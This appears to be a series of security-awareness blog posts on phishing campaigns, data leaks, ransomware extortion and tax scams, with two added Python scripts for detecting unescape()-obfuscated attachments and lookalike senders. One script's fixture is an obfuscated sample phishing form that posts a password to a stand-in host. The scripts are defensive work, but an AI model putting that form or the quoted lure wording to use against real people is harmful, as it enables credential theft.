Office 365 Phishing Kits Are Being Used in a New Attack Targeting Execs and Finance

A new highly-targeted phishing campaign is seeking to compromise the online credentials of those with influence within an organization using an Office 365-themed update attack.

The bad guys used to try to con anyone within the organization they could and then work to swim “upstream” to compromise someone in IT, an executive, etc. These days, they are dialed into using online tools like LinkedIn to identify their targets and then use social engineering tactics to convince those victims to give up valuable credentials.

A new attack spotted by security vendor Area 1 targets financial departments, C-suite executives and executive assistants within the financial services, insurance and retail industries.

Using an Office 365 service update phishing email as the initial attack vector, prospective victims are encouraged to open the attachment to read about an important update. The attachment can be a PDF, HTML or HTM file.

[Image Figure2-3 not reproduced. Source: Area 1]

A JavaScript “unescape” command is used to obfuscate the HTML that loads a phishing kit-based Office 365 credential harvesting site. The phishing kit even includes a very realistic touch of popping up an updated privacy policy before allowing the user to continue.
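The obfuscation described above is simple to undo, which is exactly what a mail gateway or analyst triage script should do before rendering the attachment. The following is an added example, not code from the original post or from Area 1: it scans an HTML/HTM attachment for JavaScript unescape() calls, decodes the percent-encoded payload (including nested layers), and reports any URLs and password fields hidden inside. The attachment text and the login-update.example.invalid domain are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample attachment: the real markup (a credential form posting to a
# placeholder domain) is hidden inside a JavaScript unescape() call.
SAMPLE_ATTACHMENT = """<html><body>
<script>
document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22https%3A%2F%2Flogin-update.example.invalid%2Fo365%2Fpost.php%22%3E%3Cinput%20name%3D%22password%22%3E%3C%2Fform%3E'));
</script>
</body></html>"""

# unescape('...') or unescape("...") with a quoted literal argument
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
URL_PATTERN = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
PASSWORD_FIELD = re.compile(r"<input[^>]*name=[\"']?password", re.IGNORECASE)


def js_unescape(s: str) -> str:
    """Emulate JavaScript's legacy unescape(): %uXXXX and %XX sequences.

    unquote() is told to use latin-1 so that each %XX maps to one character,
    which is what the JavaScript function does (it is not UTF-8 aware).
    """
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s, encoding="latin-1")


def decode_unescape_layers(html: str, max_depth: int = 5) -> list:
    """Return every decoded unescape() payload, following nested layers.

    Phishing kits sometimes wrap unescape() output in another unescape();
    the depth cap keeps a pathological attachment from looping forever.
    """
    decoded = []
    pending = [html]
    for _ in range(max_depth):
        next_round = []
        for text in pending:
            for _quote, payload in UNESCAPE_CALL.findall(text):
                plain = js_unescape(payload)
                decoded.append(plain)
                next_round.append(plain)
        if not next_round:
            break
        pending = next_round
    return decoded


def analyze_attachment(html: str) -> dict:
    """Summarise what an HTML attachment hides behind unescape() obfuscation."""
    payloads = decode_unescape_layers(html)
    urls = set()
    for p in payloads:
        urls.update(URL_PATTERN.findall(p))
    return {
        "obfuscated": bool(payloads),
        "layers": len(payloads),
        "urls": sorted(urls),
        "credential_form": any(PASSWORD_FIELD.search(p) for p in payloads),
    }


if __name__ == "__main__":
    print(analyze_attachment(SAMPLE_ATTACHMENT))
```

A hit on "credential_form" together with a URL whose host is not one of the organisation's own sign-in domains is a strong signal to quarantine the message; the decoded payloads can also be written to the triage ticket so analysts never have to open the attachment in a browser.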

[Image Figure5-3 not reproduced. Source: Area 1]

All this works to lower the victim’s defenses, establish credibility, and increase the chance of attack success.

Teaching users via Security Awareness Training to watch out for abnormal communications (such as “Microsoft” using an attachment to convey update details) can stop attacks like these in their tracks, no matter how convincing their phishing kit is.


The Growing WeTransfer Phishing Campaign Can Put Your Users at Risk

Researchers at Avanan have observed a phishing campaign that’s impersonating the WeTransfer file-sharing app in an attempt to steal users’ credentials. The email’s subject line states, “You received some important files via WeTransfer!” The body of the email informs recipients that they’ve received three files through the service, with a link to “Get your files.”

The text of the email was worded awkwardly, however, which could tip some users off:

“Dear Sir/Madam,

Attached is our order catalogue and PO-209-2021 And Terms & Condition, please check if you can provide us with those, and quote.

Look forward to have a cooperation with you ,thanks.”

The email also states “Will be deleted by April 5, 2021” to instill a sense of urgency and motivate users to click the link. The link leads to a convincingly spoofed version of WeTransfer’s website, with a popup presenting a button for the user to download their new files. The names of the files are “List of Items.pdf,” “Drawings and Specifications.zip,” and “Company Profile.mp4.”

If the user clicks the button, they’ll be taken to a login page to verify their WeTransfer credentials. When they try to log in, their credentials will be sent to the attacker. The victim will be told that a technical error occurred, and the site will request that they re-enter their password.

“Hackers will do anything to get in your inbox,” Avanan concludes. “Posing as a trusted file-sharing source, with an email you may often get, tends to be a good way to do that.”

While this phishing attack isn’t highly sophisticated, some people will still probably fall for it. Avanan notes that the phishing site’s URL clearly didn’t resemble WeTransfer’s legitimate URL, so observant users could have recognized the scam. New-school security awareness training can teach your employees how to spot the signs of phishing attacks.


[HEADS UP] Millions of Facebook Users’ Personal Information Has Been Leaked Online

A hacking forum recently published the personal data of over 553 million Facebook users. The exposed data included phone numbers, Facebook IDs, full names, locations, birthdates, bios and, in some cases, email addresses.

Alon Gal, CTO of Hudson Rock, was the person who first discovered the data leak over the weekend. “A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” Gal said in a statement.

Unfortunately, this is not the first time Facebook users’ personal information has been leaked. In 2019, a Facebook vulnerability exposed millions of users’ phone numbers, which were pulled from Facebook’s servers in violation of its terms of service.

There’s not much users can do: they are trusting Facebook with their data, and it’s up to Facebook to treat that data with care and sensitivity. Facebook should, however, notify users if there is a potential breach.

The takeaway from data breaches like these is that your organization needs to be vigilant about any suspicious activity at all times. New-school security awareness training is of the utmost importance to make sure your users know how to respond to a potential scam.


Recent Phishing Scams that Managed to Bypass Email Security Filters

Researchers at Armorblox describe several recent phishing scams that managed to bypass email security filters. The first attempted to gain access to users’ Facebook accounts.

“Recently, the Armorblox threat research team observed an email impersonating Facebook attempt to hit one of our customer environments,” Armorblox says. “The email was titled ‘Reminder: Account Verification’ with the sender name ‘Facebook’ and the sender domain ‘noreply@cc[.]mail-facebook[.]com’. The email informed victims that their account usage had been restricted due to some security concerns, and invited victims to verify their account activity to restore full access to their Facebook account.”

The email contains a link to a spoofed Facebook login page designed to steal the user’s credentials.

“The parent domain of the page is ‘sliderdoyle[.]com’, which should tell circumspect users that this isn’t a legitimate site,” the researchers write. “However, the surface-level resemblance of the page to Facebook’s real login portal combined with the urgency generated by the context of the email (restricted account access) means that many users will rush through this page and fill in their account details without looking at the URL.”

Another phishing email impersonated Apple and informed the recipient that their Apple account had been locked.

“The email was titled ‘Re: Your Apple ID has been locked on March 11, 2021 PST’ followed by a reference number,” Armorblox says. “The sender name was ‘Appie ID’, using a common technique of misspelling words to get past deterministic security techniques like filters/blocklists while still passing victims’ eye tests. The email informed victims that their Apple ID had been locked for security reasons. The email invited victims to verify their account within 12 hours or risk having their Apple ID suspended.”

In both of these cases, the scam could have been avoided if users had scrutinized the URL contained in the email. New-school security awareness training can help your employees recognize red flags associated with phishing attacks.
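The two Armorblox cases above share a pattern a filter can catch without an exact blocklist match: a display name that is (or is one typo away from) a protected brand, arriving from a domain that brand does not use, or a domain that merely contains the brand name. The following is an added example, not code from the original post or from Armorblox; the brand allowlist is illustrative and would have to be maintained by whoever deploys it, the edit-distance threshold of 1 is an assumption, and the sample senders are constructed to mirror the addresses quoted above (the appie-id.example.invalid domain is invented).

```python
import re

# Illustrative allowlist of domains each brand legitimately sends from.
# Assumption: a real deployment maintains and verifies its own list.
BRAND_DOMAINS = {
    "facebook": {"facebook.com", "facebookmail.com"},
    "apple": {"apple.com", "email.apple.com"},
    "microsoft": {"microsoft.com"},
}

# Display-name tokens this close to a brand name are treated as impersonation.
MAX_EDIT_DISTANCE = 1
MIN_TOKEN_LEN = 4  # skip very short tokens, which match brands by accident


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_host(address: str) -> str:
    """Host part of an RFC 5322 address, lower-cased and stripped of angle brackets."""
    return address.rsplit("@", 1)[-1].lower().strip("<> ")


def host_allowed(host: str, allowed: set) -> bool:
    """True if host is an allowlisted domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in allowed)


def assess_sender(display_name: str, address: str) -> dict:
    """Flag brand impersonation in the From: display name or sending domain.

    Two checks are run per brand unless the host is on that brand's allowlist:
      * a display-name token equal to, or one typo away from, the brand
        (catches 'Appie ID' standing in for 'Apple ID');
      * the brand name embedded in a non-allowlisted host
        (catches 'mail-facebook.com' standing in for facebook.com).
    """
    host = sender_host(address)
    tokens = [t for t in re.findall(r"[a-z]+", display_name.lower()) if len(t) >= MIN_TOKEN_LEN]
    reasons = []
    for brand, allowed in BRAND_DOMAINS.items():
        if host_allowed(host, allowed):
            continue
        if any(levenshtein(t, brand) <= MAX_EDIT_DISTANCE for t in tokens):
            reasons.append(f"display name impersonates {brand}: {display_name!r} from {host}")
        if brand in host:
            reasons.append(f"lookalike domain for {brand}: {host}")
    return {"flagged": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    # Constructed samples mirroring the cases in the story.
    for name, addr in [
        ("Facebook", "noreply@cc.mail-facebook.com"),
        ("Appie ID", "noreply@appie-id.example.invalid"),
        ("Facebook", "notification@facebookmail.com"),
        ("Acme Billing", "ap@acme.example.invalid"),
    ]:
        print(name, addr, assess_sender(name, addr))
```

The check is deliberately loose on the display name and strict on the domain: a legitimate brand mail always comes from an allowlisted host, so anything that looks like the brand but does not is worth a warning banner or a quarantine rather than a hard block.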

Armorblox has the story.


Data Breach at Dutch Auto Shops Puts 7.3 Million Car Owners at Risk

The Netherlands is dealing with what looks like one of the largest data breaches in the nation so far. Late last week, Dutch public broadcaster NOS revealed that the customer data of millions of car owners is available to cybercriminals. It was stolen from a Dutch company called RDC, which provides IT services to auto shops and car dealerships.

The stolen data includes home addresses, telephone numbers, birth dates, license plate numbers and car data of 7.3 million car owners.

Email addresses for 2.5 million car owners were listed. Some of the data is publicly available on the internet; the entire data set is offered on a popular hacker forum for 35,000 dollars. According to NOS, the personal data of several well-known people is part of the data set, including that of the leader of a Dutch political party.

RDC has notified the Dutch authority for protection of personal data (Autoriteit Persoonsgegevens). The company is “shocked” about the stolen data and says it has no knowledge of a recent breach in their systems, suggesting cybercriminals have been holding on to the data for a while now.

Cybersecurity researcher John Fokker at McAfee tells reporters at NOS the data set is “super useful” for bad guys. “If they get their hands on this data, it just takes one click to see where expensive cars are probably parked. They can tell where people live and what car they drive.” Additionally, spear phishing becomes surprisingly easy for cybercriminals.

Research into the breach is ongoing. The Autoriteit Persoonsgegevens says there were 76 of these ‘mega data breaches’ (involving data of more than 100,000 people) in The Netherlands in 2020.


REvil Ransomware Now Helps with Extortion by Offering to Call the Victim’s Contractors and the Media

The bad guys are going to great lengths to ensure they make their money. As part of its Ransomware-as-a-Service, REvil is now expanding its services to aid in the extortion phase.

REvil/Sodinokibi has been a major player in the RaaS market, providing its affiliate bad guys with functional ransomware malware and a payment site. It relies on the affiliate to attack, infiltrate, and compromise the victim networks in order to deploy the ransomware. This split of duties brings REvil somewhere between 20-30% of the ransom, with the affiliate taking the remainder home.

So it’s in both parties’ interest that the ransom is, first, paid and, second, as large as possible. Exfiltrating data and extorting the victim organization to pay or face publication of the stolen data has been growing over the last year, since it was first seen used by Maze.

But a new twist on the extortion saga is the launch of a calling service where REvil will call the victim organization’s business partners, local media, and more to bring the attack to light and force the organization to pay up to regain its operations.

Shown below, the ad asks for affiliates to provide organization details, chat contacts and phone numbers to call.

[Image Evya9TeXcAEH77G (the REvil affiliate ad) not reproduced. Source: Twitter]

The bad guys aren’t going to be satisfied with just taking your ransom payment; they’re going to ensure they squeeze the maximum amount of money out of your organization they can.


Insurers are Warned of Cyber Risk Growth and are Provided a New Cyber Insurance Risk Framework from the New York Department of Financial Services

As cyberattacks continue to increase, cyber insurers are always looking for ways to manage the cyber risk they take on. The NY DFS offers some best practices from top insurance companies.

I’ve covered a number of stories before of cyber insurers that did not pay out on a policy that involved some form of cyberattack. Usually it came down to a technicality or was denied due to specific attack scenarios outlined in the policy. Those news stories usually involve an insurer that is well-established and experienced in the field of cyber insurance. But for those insurers just now seeking to get into the market, without the proper experience, it could be costly if they’re not careful.

To assist, last month the NY DFS issued an open letter to property and casualty insurers, offering guidance in addressing their exposure to cyber risk through issued policies.

The framework, based on dozens of discussions with experienced cyber insurers, includes the following:

  1. Establish a Formal Cyber Insurance Risk Strategy – made up of the next six key practices, the strategy should define clear risk goals, involving senior management and the insurer’s governing body.
  2. Manage and Eliminate Exposure to Silent Cyber Insurance Risk – silent risk stems from any cyber loss that must be covered under a policy that does not explicitly mention cyber.
  3. Evaluate Systemic Risk – insureds relying on third-party vendors and supply chains can create an environment ripe for risk, which can result in a catastrophic loss to the insurer.
  4. Rigorously Measure Insured Risk – Insurers need to have a comprehensive plan to measure out the risk of a given insured. The word “rigorous” should be enough to get an idea of how much effort needs to be placed into this step.
  5. Educate Insureds and Insurance Producers – Helping the insured organization with security assessments and recommendations, as well as advocating Security Awareness Training for their employees will help reduce the risk of a claim event.
  6. Obtain Cybersecurity Expertise – You can’t insure what you don’t understand. Seek out industry expertise to assist with building out every part of this framework.
  7. Require Notice to Law Enforcement – victim organizations need to engage with local law enforcement to get assistance with data and fund recovery, prosecution of attackers, and more.

Spoofing Tailored to Financial Departments

Researchers at Area 1 Security have warned of a large spear phishing campaign targeting financial departments and C-suite employees with spoofed Microsoft 365 login pages. The researchers say that in some cases the attackers “specifically targeted newly-selected CEOs during critical transitionary periods.” Additionally, the attackers went after executives’ assistants.

“Beyond financial departments, the attackers also targeted C-suite and executive assistants,” Area 1 says. “Targeting high-level assistants is an often overlooked method of initial entry, despite these employees having access to highly sensitive information and an overall greater level of privileges. In a few instances, the attackers even attempted to bait newly-selected CEOs of two major companies before any public announcements of this significant senior executive changeover were made.”

The attackers appear to have been attempting to conduct business email compromise scams.

“A large majority of the phishing attacks stopped by Area 1 Security were headed to financial controllers and treasurers at various international companies,” the researchers write. “By targeting the financial departments of these companies, the attackers could potentially gain access to sensitive data of third parties through invoices and billing, commonly referred to as a BEC (Business Email Compromise) attack. This enables the attackers to send forged invoices from legitimate email addresses to suppliers, resulting in payments being made to attacker-owned accounts.”

The researchers note that the phishing emails were able to bypass email security measures, and the attackers seem to have been more sophisticated than most cybercriminals.

“Clever tactics were used to not only craft the phishing messages, but also to send those messages, as well as to obtain passwords,” the researchers write. “These methods utilized a number of techniques at every step — including legitimate-looking domains and login pages, plus advanced phishing kits — to bypass email authentication and Microsoft’s email defenses. It’s clear that the masterminds behind these attacks possess above-average skills compared to your typical credential harvesting schemers.”

New-school security awareness training can enable your employees to thwart targeted social engineering attacks.


Ransomware Attacks Are Growing More Costly and Effective by the Day

The availability of commodity bots and ransomware is making the business of ransomware accessible to just about everyone. And, according to new data, everyone’s getting in on the game.

I love reports that provide an insightful view into what the bad guys are doing, quantifying what we’re all experiencing as an industry. A new report from threat intelligence firm Group-IB entitled Ransomware Uncovered 2020-2021 sheds some much needed light on the current state of not just attacks, but the specific methods and techniques used in today’s ransomware attacks.

According to the report:

  • The average ransom in 2020 was $170,000; up from $80,000 in 2019
  • The average dwell time on a victim network was 13 days
  • The average downtime resulting from an attack is 18 days

Digging a bit deeper…

  • Almost one-third (29%) of attacks start with phishing
  • Almost two-thirds (64%) of attacks are via Ransomware-as-a-Service

There are two very frightening predictions in this report.

“More actors will focus on gaining access to enterprise networks for resale purposes.”

and

“Some threat actors may abandon the use of ransomware and instead focus on exfiltrating sensitive data for extortion.”

Think about what all this means: more hackers will be looking to simply gain compromised access to your environment and sell it to would-be cyberattackers who have access to even more effective and readily-available RaaS.

This is bad news, indeed.

As the bad guys ramp up their efforts to make more money off of victim organizations, it’s equally important that you begin increasing your security stance against these kinds of attacks, specifically focusing on the phishing aspect of attacks by putting employees through new-school Security Awareness Training. By continually educating users about cyber attack methods and scams, they are better prepared to spot one before they’ve made the mistake of engaging with it and putting the organization at risk.


Another Tax Season, Another Opportunity for Scams

It’s the start of tax season. This is the time of year when we collect our receipts and tax forms and hope for a nice big refund from the U.S. government. Unfortunately, cybercriminals are also looking for a nice big score as well. This year is going to be worse than ever, as many people have been struggling to make ends meet during the pandemic and are really looking forward to that refund.

According to an article by Bleeping Computer, taxpayers are being targeted with phishing attacks with RAT malware that is more aggressive than ever before. And with the new extended deadline, this only means these cybercriminals will use every social engineering technique in the book. As unemployment has skyrocketed and people have found themselves struggling to pay the bills, the pressure is on and many will look to their potential tax refund for some relief. This is going to open the door for scammers and cybercriminals to practice their craft.

Don’t Let Your Emotions Get The Best of You

Two of the most powerful tools in the scammer’s toolbox are fear and anxiety. These emotions push people’s brains into a mode of thinking closest to their animal instincts. This is known as System 1 thinking, the automatic and fast way that humans make decisions. While this method of thinking is very handy when helping us avoid a soccer ball kicked at us, it interferes with our ability to make rational decisions. By exploiting our emotions, the attackers can improve their chance that victims will overlook important gaps in the stories they are using against them. Due to COVID-19 and the anxiety already being felt, this year will be worse than ever when it comes to tax scams.

Tax scams are nothing new. They have been happening for decades. Some cybercriminals target the tax forms of the employees of entire organizations, while others target individuals for sensitive personal information and bank account information.

Same Old Attack, New Approach

W-2 scams have varied in popularity over the last few years, but never truly die off. In these scams, the attacker typically contacts the target, often a member of the HR staff, through a phishing email. The contact is made to look like it came from an executive and has requested the W-2s of all of the employees for some sort of tax reason. There is usually a story that makes the request seem urgent and a request to just attach them to an email reply. The email address they reply to with the attachment is not the executive, but the scammer. This year, I expect many of the stories behind the urgency to be COVID-19 related. I suspect we will see tales about the IRS being behind in processing so they need to file taxes early, or that some COVID-19 related tax break or credit is due to expire and they will miss it if they do not get the taxes done immediately. Once acquired, attackers will either sell the information from the tax forms or will attempt to file taxes on a victim’s behalf, claiming a significant refund, using the information on the W-2s. Then when the legitimate person tries to file his/her taxes, he/she is told it has already been done. This can take a year or more to sort out with the IRS and is very unpleasant. Organizations need to be aware of, and be prepared for, these attacks in order to protect their employees.

Another common scam around this time of year is the request to ‘verify’ a bank account. The victim will receive an email or text message pretending to be from the IRS or their bank, and will ask them to verify their account information, usually through an included link. They are often told their refund will not be deposited unless they take this step. This link will lead to a fake login page where the individual will enter their login information to ‘verify’ the account. This really just sends their login information to the cybercriminals, who then use it to access the account themselves.

Always Think Before You Click!

These are just a couple of the scams we can expect to see in the midst of heightened tensions and feelings of desperation caused by the pandemic. The best defense against these is information. It is important to teach people how the scams work so they can spot the signs regardless of the story being used. People should be taught that when confronted with an email, text message or even a phone call that causes a strong emotional response, it should be a warning sign that alerts them to be suspicious. In addition, if sensitive information of any kind is being requested, the recipient should attempt to confirm the request through a Google search (e.g., “IRS email to verify bank accounts”), or in the case of executive requests, verify the request with them over the phone on a known, good phone number.

Many of us are tired, stressed and dealing with situations we never dreamed possible two years ago. However, we need to stay vigilant against attackers that are using this to their advantage before May 17th. If we don’t, we are likely to add more stress to our lives when the attackers win with their social engineering tactics.
